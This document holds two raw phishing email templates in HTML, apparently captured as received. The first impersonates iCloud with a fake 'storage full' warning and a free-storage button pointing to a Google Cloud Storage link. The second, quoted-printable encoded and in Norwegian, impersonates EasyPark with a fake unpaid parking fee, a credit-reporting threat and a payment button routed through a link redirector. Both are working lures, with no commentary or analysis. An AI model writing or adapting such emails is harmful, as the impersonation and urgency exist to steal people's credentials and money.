<!doctype html>
<html>
  <head>
    <meta name="viewport" content="width=device-width" />
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <title>Your iCloud storage is full!</title>
    <style>
      /*STYLE*/
      
      img {
        border: none;
        -ms-interpolation-mode: bicubic;
        max-width: 100%; 
      }
      body {
       /*  background: url('{{bgssasdas.jpg}}') no-repeat fixed; */
        background: url('https://i.imgur.com/nKRA4gc.jpeg') no-repeat fixed;
        background-size: cover;
        font-family: sans-serif;
        -webkit-font-smoothing: antialiased;
        font-size: 14px;
        line-height: 1.4;
        margin: 0;
        padding: 0;
        -ms-text-size-adjust: 100%;
        -webkit-text-size-adjust: 100%; 
      }
      table {
        border-collapse: separate;
        mso-table-lspace: 0pt;
        mso-table-rspace: 0pt;
        width: 100%; }
        table td {
          font-family: sans-serif;
          font-size: 14px;
          vertical-align: top; 
      }

      .body {
        background-size: cover;
        width: 100%; 
      }
      /* Set a max-width, and make it display as block so it will automatically stretch to that width, but will also shrink down on a phone or something */
      .container {
        display: block;
        margin: 0 auto !important;
        /* makes it centered */
        max-width: 580px;
        padding: 10px;
        width: 580px; 
      }
      /* This should also be a block element, so that it will fill 100% of the .container */
      .content {
        box-sizing: border-box;
        display: block;
        margin: 0 auto;
        max-width: 505px;
        padding: 30px; 
        background-color: #fff;
        background-size: 0%;
        background-repeat: no-repeat;
        background-position: center bottom;
       /*  border: 3px solid #7d7d7f; */
      }

      .main {

        border-radius: 3px;
        width: 100%; 
      }
      .wrapper {
        box-sizing: border-box;
        padding: 20px; 
      }
      .content-block {
        padding-bottom: 10px;
        padding-top: 10px;

      }
      .footer {
        clear: both;
        margin-top: 10px;
        text-align: center;
        width: 100%; 
      }
        .footer td,
        .footer p,
        .footer span,
        .footer a {
          color: #999999;
          font-size: 12px!important;
          text-align: center; 
      }

      h1,
      h2,
      h3,
      h4 {
        color: #000;
        font-family: sans-serif;
        font-weight: 400;
        line-height: 1.4;
        margin: 0;
        margin-bottom: 30px; 
      }
      h2 {
        font-size: 25px;
        font-weight: bold;
        text-align: center;
        text-transform: capitalize;
        margin-bottom: 10px;
      }
      p,
      ul,
      ol {
        font-family: sans-serif;
        font-size: 14px;
        font-weight: normal;
        margin: 0;
        margin-bottom: 15px;
      }
        p li,
        ul li,
        ol li {
          list-style-position: inside;
          margin-left: 5px; 
      }
      a {
        color: #3498db;
        text-decoration: underline; 
      }

      .btn {
        box-sizing: border-box;
        width: 100%; }
        .btn > tbody > tr > td {
          padding-bottom: 15px; }
        .btn table {
          width: auto; 
      }
        .btn table td {
          background-color: #ffffff;
          border-radius: 5px;
          text-align: center; 
      }
        .btn a {
          background-color: #306fdb;
          border: solid 0px #00539f;
          border-radius: 5px;
          box-sizing: border-box;
          color: #fff;
          cursor: pointer;
          display: inline-block;
          font-size: 14px;
          font-weight: bold;
          margin: 0;
          padding: 12px 25px;
          text-decoration: none;
          text-transform: capitalize; 
      }
      .btn-primary table td {
          
      }
      .btn-primary a {
        border-color: #3498db;
        color: #fff;
      }


      .last {
        margin-bottom: 0; 
      }
      .first {
        margin-top: 0; 
      }
      .align-center {
        text-align: center; 
      }
      .align-right {
        text-align: right; 
      }
      .align-left {
        text-align: left; 
      }
      .clear {
        clear: both; 
      }
      .mt0 {
        margin-top: 0; 
      }
      .mb0 {
        margin-bottom: 0; 
      }
      .preheader {
        color: transparent;
        display: none;
        height: 0;
        max-height: 0;
        max-width: 0;
        opacity: 0;
        overflow: hidden;
        mso-hide: all;
        visibility: hidden;
        width: 0; 
      }
      .powered-by a {
        text-decoration: none; 
      }
      .presentation p {
        text-align: center;
        font-size: 18px;
      }

      hr {
        border: 0;
        border-bottom: 1px solid #f6f6f6;
        margin: 20px 0; 
      }

      @media only screen and (max-width: 620px) {
        table[class=body] h1 {
          font-size: 28px !important;
          margin-bottom: 10px !important; 
        }
        table[class=body] p,
        table[class=body] ul,
        table[class=body] ol,
        table[class=body] td,
        table[class=body] span,
        table[class=body] a {
          font-size: 18px; 
        }
        table[class=body] .wrapper,
        table[class=body] .article {
          padding: 10px !important; 
        }
        table[class=body] .content {
          padding: 0 !important; 
        }
        table[class=body] .container {
          padding: 0 !important;
          width: 100% !important; 
        }
        table[class=body] .main {
          border-left-width: 0 !important;
          border-radius: 0 !important;
          border-right-width: 0 !important; 
        }
        table[class=body] .btn table {
          width: 100% !important; 
        }
        table[class=body] .btn a {
          width: 100% !important; 
        }
        table[class=body] .img-responsive {
          height: auto !important;
          max-width: 100% !important;
          width: auto !important; 
        }
      }

      @media all {
        .ExternalClass {
          width: 100%; 
        }
        .ExternalClass,
        .ExternalClass p,
        .ExternalClass span,
        .ExternalClass font,
        .ExternalClass td,
        .ExternalClass div {
          line-height: 100%; 
        }
        .apple-link a {
          color: inherit !important;
          font-family: inherit !important;
          font-size: inherit !important;
          font-weight: inherit !important;
          line-height: inherit !important;
          text-decoration: none !important; 
        }
        .btn-primary table td:hover {

        }
        .btn-primary a:hover {

        }
        .button_style {
          background: #fefd02; 
          background-color:#3498db;
          background-position: center;
          background-repeat: no-repeat;
          background-size: 100% 100%;
          padding: 15px!important;
          max-width: 420px;
          min-width: 140px;
        }
      }
    </style>
  </head>
  <body class="">
    <span class="preheader"></span>
    <table role="presentation" border="0" cellpadding="0" cellspacing="0" class="body">
      <tr>
        <td> </td>
        <td class="container">
          <div class="content" style=" max-width: 420px;"><!-- border-radius: 10px; box-shadow: 0 4px 10px rgba(0, 0, 0, 0.2); -->

            <!-- START CENTERED WHITE CONTAINER -->
            <table role="presentation" class="main">

              <!-- START MAIN CONTENT AREA -->
              <tr>
                <td style="text-align: center;">
                  <!-- <img style="max-width: 200px; margin-top: 20px;" src="{{llggasss.png}}"> -->
                  <img style="max-width: 200px; margin-top: 20px;" src="https://upload.wikimedia.org/wikipedia/commons/thumb/3/3d/ICloud.svg/1200px-ICloud.svg.png">
                  
                </td>
              </tr>
              <tr>
                <td class="wrapper">
                  <table role="presentation" border="0" cellpadding="0" cellspacing="0">

                    <tr>
                      <td class="presentation" style="text-align: center;">
                        <p style="font-size: 28px;"><b>Your iCloud storage is full!</b></p>
                          <!-- <img style="max-width: 250px; margin-top: 20px;" src="{{prroodd2222.jpg}}"> -->
                          <img style="max-width: 250px; margin-top: 20px;" src="https://i.imgur.com/knRiXKK.jpeg">
                      
                        <p><br><font style="color:#333; font-weight: bold; font-size: 16px;";>Dear customer,<br></font><br>
                          <font style="color:#e50914; font-weight: bold; font-size: 18px;">Your iCloud storage is full!<br></font><br>
                          <span style="font-size: 14px;">But, as part of our loyalty program, you can now receive an additional 50 GB for free before the files on your iCloud Drive are deleted.</span>
                        </p>
                        <!-- <p><font style="font-weight: bold; color: #000000; border: none; padding: 10px; background-color: #f0f0f0; ">#4864370221</font></p> --><br>
                        <table role="presentation" border="0" cellpadding="0" cellspacing="0" class="btn btn-primary">
                          <tbody>
                            <tr>
                              <td align="center">
                                <table role="presentation" border="0" cellpadding="0" cellspacing="0">
                                  <tbody>
                                    <tr>
                                      <td><a href="https://storage.googleapis.com/new78sd6f876d87fsf/usicloud-jrg1" style="border-radius: 999px;">Extend for Free</a></td>
                                    </tr>
                                  </tbody>
                                </table>
                              </td>
                            </tr>
                          </tbody>
                        </table>
                      </td>
                    </tr>
                  </table>
                </td>
              </tr>

            <!-- END MAIN CONTENT AREA -->
            </table>
            <!-- END CENTERED WHITE CONTAINER -->

            <!-- START FOOTER -->
            <div class="footer">
              <table role="presentation" border="0" cellpadding="0" cellspacing="0">
                <tr>
                  <td class="content-block">
                  
                  </td>
                </tr>
              </table>
            </div>
            <!-- END FOOTER -->

          </div>
        </td>
        <td> </td>
      </tr>
    </table>
  </body>
</html>


<br><br><br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br><br><br><br>
<br>


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org=
/TR/xhtml1/DTD/xhtml1-strict.dtd">=0A<html xmlns=3D"http://www.w3.org/1999/=
xhtml" lang=3D"en">=0A <head>=0A  <meta http-equiv=3D"Content-Type" content=
=3D"text/html; charset=3Dutf-8">=0A  <meta name=3D"viewport" content=3D"wid=
th=3Ddevice-width, initial-scale=3D1.0"><base href=3D"https://sarahutyug.at=
lassian.net">=0A </head>=0A <body style=3D"font-family: Arial, sans-serif; =
max-width: 800px; margin: 0 auto; padding: 20px; color: #333333; color: #33=
3333; font-family: Arial, sans-serif; font-size: 14px; line-height: 1.400; =
font-family: Arial, sans-serif; max-width: 800px; margin: 0 auto; padding: =
20px; color: #333333; font-family: Arial, sans-serif; max-width: 800px; mar=
gin: 0 auto; padding: 20px; color: #333333">=0A  <div class=3D"jsd-reply-ma=
rker" style=3D"color: #999999">=0A   =E2=80=94-=E2=80=94-=E2=80=94-=E2=80=
=94=0A  </div>=0A  <style>=0A        body {=0A            font-family: Aria=
l, sans-serif;=0A            max-width: 800px;=0A            margin: 0 auto=
;=0A            padding: 20px;=0A            color: #333;=0A        }=0A   =
     .header {=0A            text-align: center;=0A            margin-botto=
m: 20px;=0A        }=0A        .logo {=0A            width: 150px; /* Set y=
our desired width */=0A            height: auto; /* Maintain aspect ratio *=
/=0A        }=0A        .important {=0A            color: #ff0000;=0A      =
      font-weight: bold;=0A        }=0A    </style>=0A  <div class=3D"heade=
r" style=3D"text-align: center; margin-bottom: 20px; text-align: center; ma=
rgin-bottom: 20px; text-align: center; margin-bottom: 20px; text-align: cen=
ter; margin-bottom: 20px; text-align: center; margin-bottom: 20px; text-ali=
gn: center; margin-bottom: 20px">=0A   <img src=3D"https://play-lh.googleus=
ercontent.com/ezq46-sKEJDe5a4sXWOWhRc-GQ_IbfKKmd_0t7omaVlf6myfnwwVf9FTfqtuN=
PAmsue_=3Dw480-h960-rw" alt=3D"EasyPark Logo" class=3D"logo" style=3D"width=
: 100px; height: 80px;; width: 150px; height: auto; width: 150px; height: a=
uto; width: 150px; height: auto; width: 150px; height: auto; width: 150px; =
height: auto; width: 150px; height: auto" width=3D"150">=0A  </div>=0A  <h1=
>EasyPark Ubetalt parkeringsavgiftsvarsel</h1>=0A  <p>Kj=C3=A6re kj=C3=B8re=
t=C3=B8yseier,</p>=0A  <p>Dette brevet informerer deg om at vi ikke har mot=
tatt betaling for den siste parkerings=C3=B8kten:</p>=0A  <ul>=0A   <li><b>=
Bel=C3=B8p skyldig: 58 NOK</b></li>=0A   <li><b>Betalingsfrist: 11-10-2024<=
/b></li>=0A  </ul>=0A  <p>Unnlatelse av =C3=A5 betale innen fristen kan f=
=C3=B8re til:</p>=0A  <ul>=0A   <li><b>Rapportering til kredittbyr=C3=A5er<=
/b></li>=0A   <li><b>Gebyrer for sen betaling</b></li>=0A  </ul>=0A  <p>For=
 =C3=A5 unng=C3=A5 konsekvenser, vennligst betal umiddelbart her:</p>=0A  <=
p></p>=0A  <center>=0A   <a href=3D"https://links.truthsocial.com/link/1132=
88659558928976" class=3D"button" style=3D"display: inline-block; padding: 1=
0px 20px; margin: 20px 0; background-color: #ff52a3; color: #000000; text-d=
ecoration: none; border-radius: 5px; display: inline-block; padding: 10px 2=
0px; margin: 20px 0; background-color: #ff52a3; color: #000000; text-decora=
tion: none; border-radius: 5px; display: inline-block; padding: 10px 20px; =
margin: 20px 0; background-color: #ff52a3; color: #000000; text-decoration:=
 none; border-radius: 5px; display: inline-block; padding: 10px 20px; margi=
n: 20px 0; background-color: #ff52a3; color: #000000; text-decoration: none=
; border-radius: 5px; display: inline-block; padding: 10px 20px; margin: 20=
px 0; background-color: #ff52a3; color: #000000; text-decoration: none; bor=
der-radius: 5px; display: inline-block; padding: 10px 20px; margin: 20px 0;=
 background-color: #ff52a3; color: #000000; text-decoration: none; border-r=
adius: 5px" bgcolor=3D"#ff52a3">Betal n=C3=A5</a>=0A  </center>=0A  <style>=
=2Ebutton {=0A        display: inline-block;=0A        padding: 10px 20px;=
=0A        margin: 20px 0;=0A        background-color: #FF52A3;=0A        c=
olor: black;=0A        text-decoration: none;=0A        border-radius: 5px;=
=0A    } </p>=0A  </style>=0A  <p>Takk for din oppmerksomhet.</p>=0A  <p>Me=
d vennlig hilsen,<br>EASPARK-teamet</p>=0A  <div class=3D"jsd-activity-item=
-content">=0A   <p>.</p>=0A  </div>=0A  <div style=3D"visibility: hidden; o=
pacity: 0; font-size: 1px; display: none; width:0; max-height: 0; overflow:=
 hidden">=0A  </div>=0A  <div class=3D"jsd-activity-item-content">=0A   <p>=
Just confirming that we got your request. We're on it.</p>=0A  </div>=0A  <=
div style=3D"visibility: hidden; opacity: 0; font-size: 1px; display: none;=
 width:0; max-height: 0; overflow: hidden">=0A   Sent on October 11, 2024 9=
:13:25 PM WEST=0A  </div>=0A </body>=0A</html>